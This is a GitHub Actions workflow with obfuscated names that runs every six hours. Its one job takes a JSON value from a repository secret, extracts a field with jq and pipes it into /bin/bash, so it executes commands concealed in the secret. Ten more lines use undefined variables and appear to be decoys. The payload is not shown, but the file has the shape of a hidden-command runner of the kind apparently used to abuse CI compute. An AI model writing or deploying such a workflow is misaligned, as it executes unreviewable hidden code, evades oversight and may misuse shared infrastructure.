name: duoknk
on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duoknk
        env:
          mcibe42: ${{ secrets.mcibe42 }}
        run: |
          echo $mcibe42 | jq -r .uezsp6644 | /bin/bash
          echo $zl1414 | jq -r .j6 | /bin/bash
          echo $p2 | jq -r .d72530 | /bin/bash
          echo $mi786 | jq -r .ul5 | /bin/bash
          echo $ktob0899 | jq -r .ikeq00013 | /bin/bash
          echo $ummw7 | jq -r .f7 | /bin/bash
          echo $sqe42 | jq -r .wrffl62 | /bin/bash
          echo $m97608 | jq -r .fhb41398 | /bin/bash
          echo $gcb406 | jq -r .cyxch9 | /bin/bash
          echo $bhlu514 | jq -r .rvoe4118 | /bin/bash
          echo $zchn55902 | jq -r .j35 | /bin/bash

